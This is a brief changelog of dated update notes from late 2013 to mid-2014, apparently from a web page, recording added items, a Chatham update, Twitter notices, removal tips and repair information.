Chatham update 3:13 pm 11-19-13
Twitter notification update 4:02 PM 11-19-13
Nineteen more section added, page rearranged 12:19 pm 11-20-13
Updated with fixes 2:16 PM 11-20-13
"39 more" added 11-21-13 7:41 am
"8 more" and "Removal Tips from KWC" added 11-21-13 3:06 PM
Item 10 added 8:12 PM 11-22-13
Items 11 and 12 added 4 PM 11-23-13
Item 13 added 11-25-13
Note added to item 13 11-27-13
Item 18 added 11-28-13 and 11-29-13
Item 19 added 11-29-13
Item 20 added 11-30-13
More repair information added to item 5 12-2-13
Item 5 updated with colors, Twitter handles, and new repair info 12-4-13
Item 21 added 11:53 am 12-12-13
Item 5 updated 7-19-14